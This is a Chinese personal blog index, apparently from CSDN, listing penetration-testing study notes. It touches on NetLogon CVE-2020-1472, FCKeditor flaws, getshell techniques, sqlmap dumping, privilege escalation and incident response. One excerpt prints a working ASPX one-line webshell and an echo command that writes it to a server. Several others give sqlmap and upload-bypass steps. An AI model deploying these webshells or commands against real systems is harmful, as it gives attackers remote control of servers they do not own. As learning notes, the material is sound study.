- 博客(30)
- 收藏
- 关注
RSS订阅原创 Linux普通用户切换成root用户
Linux普通用户切换成root用户切换到root用户sudo -i这个命令也可以尝试su -再从普通用户切到rootlogout从root用户再次切到普通用户su - 用户名
2021-07-01 14:25:20
508
原创 网页刷新JS脚本
代码:var timeout = prompt("设置刷新时间间隔[S]"); // 获取当前的URL var current = location.href; if(timeout > 0) { // 时间间隔大于0,timeout秒之后执行reload函数 setTimeout('reload()', 1000 * timeout); } else { // 时间间隔不大于0,仅刷新一次
2021-06-30 09:42:29
1038
原创 基于NetLogon权限提升漏洞(CVE-2020-1472)的域控踢拳学习
NetLogon权限提升漏洞(CVE-2020-1472)**漏洞评分10分,**漏洞利用后果严重,未经身份认证的攻击者可通过使用 Netlogon 远程协议(MS-NRPC)连接域控制器来利用此漏洞。成功利用此漏洞的攻击者可获得域管理员访问权限。影响版本:Windows Server 2008 R2 for x64-based Systems Service Pack 1Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Ser
2021-06-29 19:24:03
263
原创 编辑器漏洞详解
此处链接到大佬地址http://navisec.it/编辑器漏洞手册/本人做学习记录一、FCKeditor编辑器页FCKeditor/_samples/default.htmlFCKeditor/_samples/default.htmlFCKeditor/_samples/asp/sample01.aspFCKeditor/_samples/asp/sample02.aspFCKeditor/_samples/asp/sample03.aspFCKeditor/_samples/asp
2021-06-28 20:03:31
1569
3
原创 Getshell的各种姿势
一、进后台Getshell1、管理员后台直接Getshell管理员后台直接上传如果被Waf拦截 上传不加密的WebShell 先小????如果有权限改后台文件名 在文件名前加 …/尝试目录穿越ex:a.php ->…/a.php2、后台数据库备份Getshell上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过.当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库,如通过新建管理员用户,将用户名用一句话木马代
2021-06-28 16:13:44
1775
原创 应急响应思路
一、基础技能及工具1、常用方法三要素: 时间 地点 事件 (系统、安全设备、相关应用、操作历史日志等)回溯攻击法: 模拟攻击(使用相同手法)经验:1、常用目录(/tmp; /var/tmp; /dev/shm; RECYCLER)2、管用手法(一句话木马;常见后门)3、常见恶意程序特征2、日志主机: 应用程序、安全设备、系统日志其他: IIS、Apache、Tomcat日志3、日志ID登录: 4625登录失败 ; 4624登录成功事件: 拒绝访问 句柄无效 存储控制块被破坏 存储空
2021-06-27 23:56:35
239
1
原创 内网提权泛谈
内网提权泛谈一、Windows权限分类在windows中,权限大概分为四种,分别是User、Administrator、System、TrustedInstallerTrus1.user:普通用户权限,是系统中最安全的权限(因为分配给改组的默认权限不允许成员操作修改操作系统的设置或用户资料)2.Administrator: 管理员权限。可以利用windows的机制将自己提升为system权限,以便操作SAm文件3.System: 系统权限。可以对sam等敏感文件进行读取,往往需要将administ
2021-06-27 17:01:03
232
原创 Macos中docker安装awvs
**安装docker**➊ docker中拉取下载镜像docker pull secfa/docker-awvs➋ 将docker的3443端口映射到物理机的 13443端口docker run -it -d -p 13443:3443 secfa/docker-awvs➌ 如果有报错重启docker后再重复第②步docker service docker restart或systemctl restart docker➍ 访问awvshttps://docker所在服务器的ip:
2021-06-25 14:57:42
1559
3
转载 拒绝服务攻击(DOS和DDOS)
简介:**DDoS:(Distributed Denial of Service)**攻击指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DDoS攻击,从而成倍地提高拒绝服务攻击的威力。达到阻止目标业务运转和系统瘫痪的目的。攻击类型类型特征流量型(直接)SYN\ACK\ICMP\UDP\Connection FLOOD等告警流量型(反射)NTP\DNS\SSDP\ICMP FLOOD等告警CC流量变化可能不明显,业务访问缓慢,超时
2021-05-06 16:06:30
824
原创 Python 生成exe可执行文件
在PyCharm下安装pyinstaller在Terminal下输入:“pyinstaller -F -w *.py” 就可以制作出exe。生成的文件放在同目录dist下。-F(注意大写)是所有库文件打包成一个exe,-w是不出黑色控制台窗口。不加-F参数生成一堆文件,但运行快。压缩后比单个exe文件还小一点点。加-F参数生成一个exe文件,运行起来慢。...
2021-04-22 16:14:13
66
原创 羊毛出在羊身上
被????薅了半年没登录并夕夕的我,今天登录了一次,咦,突然发现自己成了“新用户”,然后告诉我可以买月卡嘛,因以前买过多次并夕夕月的缘由,我就点进去看了看。本来并夕夕月卡是3元,后来变成了五元,后来又变成了八元,到最后一次我登录的时候是十元还是十三元来着。今天点进去后发现这个“新用户3.2元开通三个月的”的时候是并夕夕给老用户惊喜,于是我就直接买了,然后发现原来的五元无门槛优惠券变成了现在必须要完成任务之后才能领,我就随手完成了几个任务,反正并不能满足所以的达成100%,且必须要进行拼单。薅羊毛小王子也
2021-03-18 11:50:18
227
原创 Python杂谈
一、基础语法1.1 、执行及声明#!/usr/bin/python3 防止操作系统用户没有将python3装在默认的/usr/bin路径里python #coding:UTF-8python2 下默认使用ASCII编码 ,需声明编码格式。1.2.基本语法注释‘’‘可以写段落注释’’’特殊字符\n 换行\ 转义字符" 大于’ 双引号可包含单引号print(,) print输出多项时可以用 “,” 分割,且默认是换行状态print("",end = ‘’)
2021-03-16 21:00:35
72
原创 Linux忘记密码解决方法
linux下忘记系统密码情况下1.centos系统先开机,然后根据图中选择第一个选项,按下e进入编辑模式然后根据提示想图中代码ro后删除替换为 rw rd.break然后按下ctrl x依次输入以下命令。# chroot /sysroot# passwd //这步会提示修改密码,输入两次密码后提示密码修改成功# touch /.autorelabe# exit# rebootchroot /sysrootpasswordtouch /.autorelabelexitreb
2021-03-16 19:45:14
123
原创 某HW行动中的一次渗透测试
转载:https://xz.aliyun.com/t/8493某HW行动中的一次渗透测试在某次HW行动中对一个学校的资产进行渗透测试。在其一个智慧校园管理系统发现了一处sql注入。可以看到可以选择以什么身份登陆,而且选择学生登陆的时候,还可以选择年级。抓包看下是否存在数据库交互:可以看到,会去服务器请求对应年级的数据,尝试添加单引号,出现报错,证实存在sql注入。因为网站没有waf,所以直接拿sqlmap跑:可以跑出管理员的账号,并且拿到了os-shell。因为os-shell不.
2020-12-11 14:57:07
378
原创 关于安全运维的琐事
centos最小化安装完成centos后发现好多功能都没有centos7如何查看ip信息?centos 6.5以前都可以用ifconfig 但是centos 7里面没有了先看ip addr 如果没有查到信息再查看网络配置vi/etc/sysconf ig/network-scripts/ifcfg-ens33若网卡没有打开,将其设置为yes(技巧:按J键将光标移动到最后一行,用L键将光标移动到最后一列)启动网卡 service network start安装一些基本的功能 yum -
2020-11-19 15:41:08
94
原创 CoblatStrike的一些弱鸡操作
2020年11月18日生活压力 工作压力 爱情压力 友情压力 。。。。。。 我再一次迷茫了 我是谁 我在哪 我在干什么,我想要做什么 ,我要得到什么。
2020-11-18 10:53:12
177
原创 小皮nginx解析漏洞
一、Phpstudy(小皮面板)简介:PhpStudy国内12年老牌公益软件,集安全,高效,功能与一体,已获得全球用户认可安装,运维也高效。支持一键LAMP,LNMP,集群,监控,网站,FTP,数据库,JAVA等100多项服务器管理功能。二、漏洞简介:自从2019年Phpstudy爆出的后门事件已经过去一段时间了,期间也没有爆出过什么漏洞,并且现在Phpstudy(小皮面板)已经改版了,这次爆出的漏洞是nginx的解析漏洞,也就是存在已久的/xx.php解析漏洞PHPstudy(小皮模板存在ngin
2020-09-03 10:37:49
411
原创 网络安全Linux系统基本操作
Linux 和WIN 系统区别Linux开源 免费 安全Win 不开源 不免费 不安全Linux 基本操作s 列出目录信息ls -a 显示隐藏ls -l 显示详细信息~# 用户目录mkdir admin创建文件夹cat hello 查看文件cp 复制mv 移动rm 删除rm -rf test 删文件夹./ wget URL/ 可下载内容systeminfo 如果360等提示更新在里面
2020-08-28 17:34:12
295
原创 PHP基础快速入门
**超文本预处理语言文件格式 <?php echo''; ?>可以和所有HTML标签一起镶嵌使用注释// # /* */utf-8声明,否则有时会乱码header(“Content-type: text/html; charset=utf-8”);变量字母下划线开始 _ a 名字母数字下划线 没有空格 区分大小写$a =100;echo $a;10/3=3.3333…除法单双引号的区别""可以解析变量 ''不可以 ""可以解析\
2020-08-26 17:46:57
180
原创 宝塔面板Linux7.4.2以及Windows6.8版本PhpmyAdmin未加签权漏洞
0x01漏洞说明【法律无情,请不要以身试法】宝塔面板Linux7.4.2以及Windows6.8版本PhpmyAdmin未加签权,通过IP:888/pma可以直接登录数据库,现已出现漏洞批量利用工具,可通过Zmap扫描全球888端口进行大规模提权。0x02解决方法宝塔官方已发布紧急更新,所有使用此版本的用户升级到最新版即可解决。(这个周陪领导出去风花雪月了,没复现)...
2020-08-24 11:51:17
190
原创 深信服edr终端漏洞
一、前言最近这些天来了广州当蓝方,工作之余听到了几个朋友说关于深信服edr爆0day的情况,自己也没时间复现,就简单记录一下。该XXX简介:深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。**二、影响范围fofa上大概有37页
2020-08-20 10:55:36
4397
原创 文件上传小记
一、文件上传漏洞描述1.1漏洞原理网站的上传功能没有进行严格的限制,存在任意文件上传漏洞,容易被上传恶意脚本1.2漏洞危害攻击者可通过此漏洞上传恶意脚本文件,对服务器的正常运行造成安全威胁影响等攻击者可上传可执行的Webshell(php,jsp,asp,aspx等类型脚本木马),获取利用目录跳转上传html,gif,config覆盖系统原有的文件,达到获取系统权限的目的。1.3修复建议1.对上传文件格式进行严格校验及安全扫描,防止上传恶意脚本文件2.设置权限限制,禁止上传
2020-08-14 00:34:41
185
原创 关于SQLMap的使用
SQLMap基本参数1.如果存在注入点,将会显示Web容器、数据库版本信息。-u2.读取整个数据库 -u “xxx” --dbs3.查看当前应用程序所用数据库:sqlmap -u “http://XXXXXXX?id=1” --current-dbs4、列出指定数据库的所有表:sqlmap -u “http://XXXXXXX?id=1” --tables -D “admin”5、读取指定表中的字段名称:sqlmap -u “http://XXXXXXX?id=1” --columns
2020-08-12 23:18:00
224
原创 关于--os-shell写webshell
1.首先需要知道目录(web目录)2.得是DBA权限寻找web目录dir C:\ /s /b | find “xLogin.aspx”这里需要注意转义^echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > 'C://FFJWebTJ//fon.aspx'os-shell 无法执行的时候,权限低的时候可以尝试 sql-shell写webshellselect
2020-07-30 01:48:03
2030
原创 ChungYii的第一篇博客
2020年7月28日ChungYii的第一篇博客。以激励自毕设结束之后颓废的我。这段时间很迷茫,我去了一个做安服的部门,部门里的人都比较看好我,不管是带我的哥,还是部门经理,甚至还是其他部门的人。但是每天做着很无趣的工作,或者说是去做安服自己的能力又达不到 又不想做...
2020-07-28 16:15:34
110
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人